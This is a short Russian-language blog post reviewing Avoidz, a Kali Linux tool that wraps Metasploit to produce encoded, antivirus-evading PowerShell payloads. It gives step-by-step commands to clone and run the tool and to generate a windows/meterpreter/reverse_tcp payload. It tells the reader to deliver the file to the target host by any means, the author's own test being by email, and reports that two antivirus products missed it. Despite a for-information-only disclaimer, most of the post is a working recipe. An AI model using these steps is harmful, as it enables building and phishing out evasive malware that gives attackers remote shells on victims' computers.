Avoidz-инструмент для автогенерации полезной нагрузки

Avoidz-инструмент для автогенерации полезной нагрузки


https://t.me/futurecomingsoon


Привет Друзья и те,кому небезразлична ИБ.

Напоминаю гостям,что администрация ресурса и автор обзора , не призывают использовать рассматриваемые инструменты в незаконных целях.Вся информация исключительно для ознакомления.

Сегодня буду вас знакомить с интересной и свежей версией байпаса.

Помогать мне в этом будет Kali Linux.

Инструмент работает с Metasploit ,автоматически генерирует в закодированном виде powershell, опираясь на полезные нагрузки,которыми богат Metasploit.

На выходе мы получаем готовый, конвертируемый в исполняемый файл объект,который надо доставить на тестируемый хост.


Зависимости,которые требуются:

1 - metasploit-framework

2 - xterm

3 - MinGW32

4 - Monodevelop


Как скачать : git clone https://github.com/M4sc3r4n0/avoidz.git

Затем необходимо зайти в директорию инструмента

# cd avoidz/


Сделать файл setup.sh исполняемым : # chmod +x setup.sh

Запустить этот скрипт,он проверит наличие зависимостей: # . /setup.sh

Далее , можно познакомиться с опциями: #. /avoidz.rb


Формат команды для подготовки и генерирования полезной нагрузки :

# ./avoidz.rb -h ip адрес цели -p номер порта,на котор.прилетит сессия -m windows/meterpreter/reverse_tcp -f temp1

Файл доставляем каким угодно способом на целевой хост (я тестировал на своих ресурсах через получение письма). Терминал не закрываем,соглашаемся с предложением и ждём..в случае удачи получаем сессию.

Ссылка на видео от автора.

Подробно не тестировал этот метод,при выборочной проверке Nodе32 и "Касперский" полной версии тревогу не объявляли.

А вот при запуске,правда,последний иногда перехватывал процесс и определял в карантин экзешник как неизвестный тип вредоноса.

Возможно ,кому-то будет интересно. А у меня на этом пока всё. Благодарю за внимание.

Report Page